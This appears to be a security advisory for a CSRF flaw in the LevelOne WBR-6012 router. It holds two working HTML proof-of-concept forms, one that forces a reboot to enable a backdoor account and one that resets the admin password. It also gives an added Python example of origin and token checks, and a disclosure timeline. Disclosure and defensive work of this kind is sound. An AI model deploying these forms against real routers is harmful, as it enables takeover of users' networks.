CVE-2024-24777
A cross-site request forgery (CSRF) vulnerability exists in the Web Application functionality of the LevelOne WBR-6012 R0.40e6. A specially crafted HTTP request can lead to unauthorized access. An attacker can stage a malicious web page to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6012 R0.40e6
WBR-6012 - https://us.level1.com/products/wbr-6012
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-352 - Cross-Site Request Forgery (CSRF)
The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.
The LevelOne WBR-6012 router’s web application has a CSRF vulnerability that permits attackers to execute unauthorized actions without the user’s knowledge because it lacks proper origin enforcement, allowing external websites to make requests as if they were the user. There does not appear to be any logic within the device’s firmware which checks the origin of HTTP requests.
The two proofs of concept below demonstrate leveraging the Cross-Site Request Forgery (CSRF) vulnerability in conjunction with two other vulnerabilities to 1) reboot the device to enable the backdoor account (TALOS-2024-XXXX) and 2) change the admin’s password without knowing the existing password (TALOS-2024-XXXX).
Reboot the Device (enable the backdoor, TALOS-2024-1979)
<html>
<form enctype="application/x-www-form-urlencoded" method="GET" action="http://192.168.1.1/cgi-bin/rebo">
<table>
<tr>
<td></td>
<td><input type="text" value="undefined" name=""></td>
</tr>
</table><input type="submit" value="submit">
</form>
</html>
Change the Password (without knowledge of the existing password, TALOS-2024-1984)
<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://192.168.1.1/cgi-bin/pass">
<table>
<tr>
<td>dummy param</td>
<td><input type="text" value="test" name="test"></td>
</tr>
<tr>
<td>new pw</td>
<td><input type="text" value="test" name="Pa"></td>
</tr>
</table><input type="submit" value="http://192.168.1.1/cgi-bin/pass">
</form>
</html>
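The advisory states that the firmware performs no origin check on HTTP requests. The following is an added example, not Talos or LevelOne code, of the minimal server-side logic that would reject the forged requests shown in the two proofs of concept above: state-changing endpoints are restricted to POST, the Origin (or, failing that, Referer) header must match the device's own origin, and a per-session CSRF token must accompany the request. The LAN address and the two CGI paths are taken from the page; the trusted-origin set, the session/token store, the `csrf_token` form field name and the sample requests are assumptions made for the illustration.

```python
"""
Added example (not Talos or LevelOne code): a same-origin plus CSRF-token
check of the kind the WBR-6012 advisory says the firmware lacks.
"""
import hmac
import secrets
from typing import Dict, Optional, Tuple

from urllib.parse import urlsplit

# Origin from which the administrative UI is legitimately served.
# 192.168.1.1 comes from the advisory's proof-of-concept forms;
# restricting to exactly this set is an assumption.
TRUSTED_ORIGINS = {"http://192.168.1.1"}

# Endpoints that change device state. Both paths are the ones the
# proofs of concept target. They are protected regardless of method,
# which matters because the reboot handler accepts GET.
STATE_CHANGING = {"/cgi-bin/rebo", "/cgi-bin/pass"}


def issue_csrf_token(session_tokens: Dict[str, str], session_id: str) -> str:
    """Mint a random per-session token; the UI embeds it in its own forms."""
    token = secrets.token_urlsafe(32)
    session_tokens[session_id] = token
    return token


def _origin_of(url: str) -> Optional[str]:
    """Reduce a URL to scheme://host[:port]; None if it has no such parts."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def request_allowed(method: str, path: str, headers: Dict[str, str],
                    form: Dict[str, str], session_tokens: Dict[str, str],
                    session_id: str) -> Tuple[bool, str]:
    """Decide whether a request may reach a state-changing handler.

    Returns (allowed, reason). Fails closed: a request with neither an
    Origin nor a parseable Referer is rejected, as is one whose token
    is missing or does not match the session's token.
    """
    if path not in STATE_CHANGING:
        return True, "read-only endpoint"

    # 1. State changes only via POST; a GET to /cgi-bin/rebo is refused.
    if method.upper() != "POST":
        return False, f"state change attempted with {method.upper()}"

    # 2. The browser-supplied origin must be the device's own UI.
    lowered = {k.lower(): v for k, v in headers.items()}
    origin = lowered.get("origin")
    if origin is None and "referer" in lowered:
        origin = _origin_of(lowered["referer"])
    if origin not in TRUSTED_ORIGINS:
        return False, f"untrusted origin {origin!r}"

    # 3. The form must carry the session's CSRF token (constant-time compare).
    expected = session_tokens.get(session_id)
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"

    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: a legitimate password change from the device's
    # own UI passes; the same request arriving cross-origin does not.
    store: Dict[str, str] = {}
    tok = issue_csrf_token(store, "session-A")
    print(request_allowed("POST", "/cgi-bin/pass",
                          {"Origin": "http://192.168.1.1"},
                          {"Pa": "new-password", "csrf_token": tok},
                          store, "session-A"))
    print(request_allowed("POST", "/cgi-bin/pass",
                          {"Origin": "http://other.example"},
                          {"Pa": "new-password", "csrf_token": tok},
                          store, "session-A"))
```

The two checks are deliberately layered: the Origin/Referer comparison stops the cross-site form submissions shown above, while the per-session token also covers clients that strip or omit those headers, which is why the function rejects rather than accepts when both headers are absent. Requiring POST for anything that changes state removes the simplest forgery vector entirely, since the reboot endpoint in the first proof of concept is reachable with a plain GET.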
2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.